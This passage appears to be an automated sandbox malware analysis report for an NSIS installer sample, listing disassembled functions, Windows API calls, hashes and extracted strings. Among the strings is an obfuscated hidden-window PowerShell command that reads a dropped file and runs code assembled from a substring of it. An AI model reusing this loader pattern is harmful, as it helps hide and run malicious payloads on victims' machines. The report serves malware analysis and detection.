                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                          • String ID: "$"C:\Users\user\Desktop\hnTW5HdWvY.exe"$"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs$C:\Users\user\Desktop$C:\Users\user\Desktop\hnTW5HdWvY.exe$Error launching installer$Low$NSIS Error$Profiling Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                          • API String ID: 4107622049-2073649725
                                                                          • Opcode ID: 0d7fa00730437da9ddf290d822faeb6c7a1a34a91ab4856d0ef7111e7c2b87d8
                                                                          • Instruction ID: 928bf8b7717c50f7cf81e46c7c3b8c2b1ab21f80cc33b5d8a4cab443c6c74aa6
                                                                          • Opcode Fuzzy Hash: 0d7fa00730437da9ddf290d822faeb6c7a1a34a91ab4856d0ef7111e7c2b87d8
                                                                          • Instruction Fuzzy Hash: D0B106705083816EE7216F745C8DA2F3EA8AB86306F04057EF581B61E2C77C9A058B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 330 404fa3-404fbf 331 405150-405156 330->331 332 404fc5-40508e GetDlgItem * 3 call 403e9d call 404703 GetClientRect GetSystemMetrics SendMessageA * 2 330->332 334 405180-40518c 331->334 335 405158-40517a GetDlgItem CreateThread FindCloseChangeNotification 331->335 350 405090-4050aa SendMessageA * 2 332->350 351 4050ac-4050af 332->351 337 4051ae-4051b4 334->337 338 40518e-405194 334->338 335->334 342 4051b6-4051bc 337->342 343 405209-40520c 337->343 340 405196-4051a9 ShowWindow * 2 call 403e9d 338->340 341 4051cf-4051d6 call 403ecf 338->341 340->337 354 4051db-4051df 341->354 347 4051e2-4051f2 ShowWindow 342->347 348 4051be-4051ca call 403e41 342->348 343->341 345 40520e-405214 343->345 345->341 352 405216-405229 SendMessageA 345->352 355 405202-405204 call 403e41 347->355 356 4051f4-4051fd call 404e65 347->356 348->341 350->351 359 4050b1-4050bd SendMessageA 351->359 360 4050bf-4050d6 call 403e68 351->360 361 405326-405328 352->361 362 40522f-40525b CreatePopupMenu call 405b9c AppendMenuA 352->362 355->343 356->355 359->360 369 4050d8-4050ec ShowWindow 360->369 370 40510c-40512d GetDlgItem SendMessageA 360->370 361->354 367 405270-405286 TrackPopupMenu 362->367 368 40525d-40526d GetWindowRect 362->368 367->361 372 40528c-4052a6 367->372 368->367 373 4050fb 369->373 374 4050ee-4050f9 ShowWindow 369->374 370->361 371 405133-40514b SendMessageA * 2 370->371 371->361 375 4052ab-4052c6 SendMessageA 372->375 376 405101-405107 call 403e9d 373->376 374->376 375->375 377 4052c8-4052e8 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 375->377 376->370 379 4052ea-40530a SendMessageA 377->379 379->379 380 40530c-405320 GlobalUnlock SetClipboardData CloseClipboard 379->380 380->361
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405003
                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405012
                                                                          • GetClientRect.USER32(?,?), ref: 0040504F
                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405057
                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405078
                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405089
                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040509C
                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050AA
                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050BD
                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050DF
                                                                          • ShowWindow.USER32(?,00000008), ref: 004050F3
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405114
                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405124
                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040513D
                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405149
                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405021
                                                                            • Part of subcall function 00403E9D: SendMessageA.USER32(00000028,?,00000001,00403CCE), ref: 00403EAB
                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405165
                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00004F37,00000000), ref: 00405173
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040517A
                                                                          • ShowWindow.USER32(00000000), ref: 0040519D
                                                                          • ShowWindow.USER32(?,00000008), ref: 004051A4
                                                                          • ShowWindow.USER32(00000008), ref: 004051EA
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040521E
                                                                          • CreatePopupMenu.USER32 ref: 0040522F
                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405244
                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405264
                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040527D
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052B9
                                                                          • OpenClipboard.USER32(00000000), ref: 004052C9
                                                                          • EmptyClipboard.USER32 ref: 004052CF
                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004052D8
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004052E2
                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F6
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040530F
                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 0040531A
                                                                          • CloseClipboard.USER32 ref: 00405320
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                          • String ID:
                                                                          • API String ID: 4154960007-0
                                                                          • Opcode ID: 368293ae39bef55916d87790870d27055f7ea109493cf3f148aba3dc50e3ddc3
                                                                          • Instruction ID: d5812118e63f16fa5c19f57adc5cd4d6a9be73a85bc34068d170a9efe70f60b8
                                                                          • Opcode Fuzzy Hash: 368293ae39bef55916d87790870d27055f7ea109493cf3f148aba3dc50e3ddc3
                                                                          • Instruction Fuzzy Hash: 84A16B70900208FFEB119FA4DD89AAE7F79FB48344F00416AFA01B61A0C7795E50DFA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 519 405b9c-405ba7 520 405ba9-405bb8 519->520 521 405bba-405bcf 519->521 520->521 522 405dc2-405dc6 521->522 523 405bd5-405be0 521->523 524 405bf2-405bfc 522->524 525 405dcc-405dd6 522->525 523->522 526 405be6-405bed 523->526 524->525 527 405c02-405c09 524->527 528 405de1-405de2 525->528 529 405dd8-405ddc call 405b7a 525->529 526->522 530 405db5 527->530 531 405c0f-405c44 527->531 529->528 533 405db7-405dbd 530->533 534 405dbf-405dc1 530->534 535 405c4a-405c55 GetVersion 531->535 536 405d5f-405d62 531->536 533->522 534->522 537 405c57-405c5b 535->537 538 405c6f 535->538 539 405d92-405d95 536->539 540 405d64-405d67 536->540 537->538 541 405c5d-405c61 537->541 544 405c76-405c7d 538->544 545 405da3-405db3 lstrlenA 539->545 546 405d97-405d9e call 405b9c 539->546 542 405d77-405d83 call 405b7a 540->542 543 405d69-405d75 call 405ad8 540->543 541->538 548 405c63-405c67 541->548 557 405d88-405d8e 542->557 543->557 550 405c82-405c84 544->550 551 405c7f-405c81 544->551 545->522 546->545 548->538 553 405c69-405c6d 548->553 555 405c86-405ca1 call 405a61 550->555 556 405cbd-405cc0 550->556 551->550 553->544 565 405ca6-405ca9 555->565 558 405cd0-405cd3 556->558 559 405cc2-405cce GetSystemDirectoryA 556->559 557->545 561 405d90 557->561 563 405cd5-405ce3 GetWindowsDirectoryA 558->563 564 405d3d-405d3f 558->564 562 405d41-405d44 559->562 566 405d57-405d5d call 405de5 561->566 562->566 567 405d46-405d4a 562->567 563->564 564->562 569 405ce5-405cef 564->569 565->567 570 405caf-405cb8 call 405b9c 565->570 566->545 567->566 572 405d4c-405d52 lstrcatA 567->572 574 405cf1-405cf4 569->574 575 405d09-405d1f SHGetSpecialFolderLocation 569->575 570->562 572->566 574->575 577 405cf6-405cfd 574->577 578 405d21-405d38 SHGetPathFromIDListA CoTaskMemFree 575->578 579 405d3a 575->579 580 405d05-405d07 577->580 578->562 578->579 579->564 580->562 580->575
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,00404E9D,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000), ref: 00405C4D
                                                                          • GetSystemDirectoryA.KERNEL32(Exec,00000400), ref: 00405CC8
                                                                          • GetWindowsDirectoryA.KERNEL32(Exec,00000400), ref: 00405CDB
                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0078EAA8), ref: 00405D17
                                                                          • SHGetPathFromIDListA.SHELL32(0078EAA8,Exec), ref: 00405D25
                                                                          • CoTaskMemFree.OLE32(0078EAA8), ref: 00405D30
                                                                          • lstrcatA.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D52
                                                                          • lstrlenA.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,00404E9D,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000), ref: 00405DA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                          • String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$Exec$Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 900638850-383215854
                                                                          • Opcode ID: 9e5fa4849c676bd36283baea63b88551cad492c77ebc301685f8ff802d5d5524
                                                                          • Instruction ID: 9e84d75f846cee838fb64c09e4141d624f321ac221b592bdbe658a79732caf68
                                                                          • Opcode Fuzzy Hash: 9e5fa4849c676bd36283baea63b88551cad492c77ebc301685f8ff802d5d5524
                                                                          • Instruction Fuzzy Hash: EE61EF71A04A05AFEB106B648C88BBF3BA5EF56314F14813BE541BA2D1D33C5981DF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 581 40543a-405460 call 4056f8 584 405462-405474 DeleteFileA 581->584 585 405479-405480 581->585 586 405603-405607 584->586 587 405482-405484 585->587 588 405493-4054a3 call 405b7a 585->588 589 4055b1-4055b6 587->589 590 40548a-40548d 587->590 596 4054b2-4054b3 call 405651 588->596 597 4054a5-4054b0 lstrcatA 588->597 589->586 592 4055b8-4055bb 589->592 590->588 590->589 594 4055c5-4055cd call 405e7e 592->594 595 4055bd-4055c3 592->595 594->586 605 4055cf-4055e3 call 40560a call 4053f2 594->605 595->586 599 4054b8-4054bb 596->599 597->599 601 4054c6-4054cc lstrcatA 599->601 602 4054bd-4054c4 599->602 604 4054d1-4054ef lstrlenA FindFirstFileA 601->604 602->601 602->604 606 4054f5-40550c call 405635 604->606 607 4055a7-4055ab 604->607 620 4055e5-4055e8 605->620 621 4055fb-4055fe call 404e65 605->621 614 405517-40551a 606->614 615 40550e-405512 606->615 607->589 609 4055ad 607->609 609->589 618 40551c-405521 614->618 619 40552d-40553b call 405b7a 614->619 615->614 617 405514 615->617 617->614 623 405523-405525 618->623 624 405586-405598 FindNextFileA 618->624 632 405552-40555d call 4053f2 619->632 633 40553d-405545 619->633 620->595 626 4055ea-4055f9 call 404e65 call 405a2e 620->626 621->586 623->619 629 405527-40552b 623->629 624->606 627 40559e-4055a1 FindClose 624->627 626->586 627->607 629->619 629->624 641 40557e-405581 call 404e65 632->641 642 40555f-405562 632->642 633->624 634 405547-405550 call 40543a 633->634 634->624 641->624 643 405564-405574 call 404e65 call 405a2e 642->643 644 405576-40557c 642->644 643->624 644->624
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 00405463
                                                                          • lstrcatA.KERNEL32(pivot\drukmaases.kin,\*.*,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054AB
                                                                          • lstrcatA.KERNEL32(?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054CC
                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054D2
                                                                          • FindFirstFileA.KERNELBASE(pivot\drukmaases.kin,?,?,?,00409014,?,pivot\drukmaases.kin,?,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004054E3
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405590
                                                                          • FindClose.KERNEL32(00000000), ref: 004055A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pivot\drukmaases.kin
                                                                          • API String ID: 2035342205-1775042556
                                                                          • Opcode ID: 674cc7c14af956293775df5d969b14a71ceab8ff2b31b4e5d899a70ce42ae62b
                                                                          • Instruction ID: 8ee730f1ebc31b0169d0384be9803177be11285333fd16537a0ab87d7e7bd3ec
                                                                          • Opcode Fuzzy Hash: 674cc7c14af956293775df5d969b14a71ceab8ff2b31b4e5d899a70ce42ae62b
                                                                          • Instruction Fuzzy Hash: 2D51D030900A04BADB216B65CC45BBF7A79DB82755F14817BF844B12D2D33C9A82DFAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208C
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402145
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 004020C6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
                                                                          • API String ID: 123533781-2505418928
                                                                          • Opcode ID: 4ba3537fe497458feca8795abc7d6864e8c346593bf1e1b685935b2849559c10
                                                                          • Instruction ID: 5157e5bb901614104f2663cb9119d9abf172b2b834e28e211f1a5824c3cc141a
                                                                          • Opcode Fuzzy Hash: 4ba3537fe497458feca8795abc7d6864e8c346593bf1e1b685935b2849559c10
                                                                          • Instruction Fuzzy Hash: 90416AB5A00205BFCB00DFA4CD88E9D7BB6AF88314F204169F905FB2E5CA79D941DB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(?,0079FD48,pivot\drukmaases.kin,0040573B,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 00405E89
                                                                          • FindClose.KERNEL32(00000000), ref: 00405E95
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID: pivot\drukmaases.kin
                                                                          • API String ID: 2295610775-360973136
                                                                          • Opcode ID: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
                                                                          • Instruction ID: fa6d82a82db092ae67cc5cf3184883c37463242b015de973cf80f9822f081d1d
                                                                          • Opcode Fuzzy Hash: 3763a39385d799a14c195428d029b32a8ec39fb0b73e790bf0c2a45bf7f4e082
                                                                          • Instruction Fuzzy Hash: D7D012319095205BC7015738AC0C84B7A58DF553717104A32F4A9F52E0C3789D629AE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
